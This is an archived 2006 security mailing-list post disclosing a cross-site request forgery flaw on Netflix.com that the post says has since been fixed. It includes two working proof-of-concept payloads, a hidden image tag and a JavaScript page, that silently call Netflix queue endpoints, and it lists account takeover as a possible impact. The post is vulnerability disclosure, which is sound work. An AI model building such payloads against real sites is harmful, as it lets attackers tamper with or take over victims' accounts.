WebApp Sec mailing list archives
Netflix.com XSRF vuln
From: "Dave Ferguson" <gmdavef () gmail com>
Date: Mon, 16 Oct 2006 08:51:41 -0500
I just posted information to the Full Disclosure list about a Cross Site Request Forgery (XSRF) vulnerability on Netflix.com. Netflix has recently fixed several of the most serious issues. Some of you in the U.S. may be Netflix subscribers. Here are some of the things that could have been done to you if you visited the wrong web page.

- add movies to your rental queue
- add a movie to the top of your rental queue
- change the name and address on your account
- change the email address and password on your account (i.e., take over your account)
- cancel your account (Unconfirmed/Conjectured)

The exploits are extremely simple and are especially effective if the victim chooses to stay logged on to the Netflix site. For example, to add a DVD to a victim's queue, an attacker would add an image tag to his web page and just wait for Netflix subscribers to visit the page.

<img src="http://www.netflix.com/AddToQueue?movieid=70011204" width="1" height="1" border="0">

Adding a DVD to the top of the queue takes a little JavaScript, but is even nastier because it would probably be shipped before the victim knew what had happened.

<html>
<head>
<script language="JavaScript" type="text/javascript">
function load_image2() {
  var img2 = new Image();
  img2.src="http://www.netflix.com/MoveToTop?movieid=70023965&fromq=true";
}
</script>
</head>
<body>
<img src="http://www.netflix.com/AddToQueue?movieid=70023965" width="1" height="1" border="0">
<script>
setTimeout( 'load_image2()', 2000 );
</script>
</body>
</html>

I think XSRF could be a sleeping giant, kind of like XSS was a year or two ago. Jesse Burns has a great whitepaper about XSRF here:
http://www.isecpartners.com/documents/XSRF_Paper.pdf

Regards,
Dave Ferguson